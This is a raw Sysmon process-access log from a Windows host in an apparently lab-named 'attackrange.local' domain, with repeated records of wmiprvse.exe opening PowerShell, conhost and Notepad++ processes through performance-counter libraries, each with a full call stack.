21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151077Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151076Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151075Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151074Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151073Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151072Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151071Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151070Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151069Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151068Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151067Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151066Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151065Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151064Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151063Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151062Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 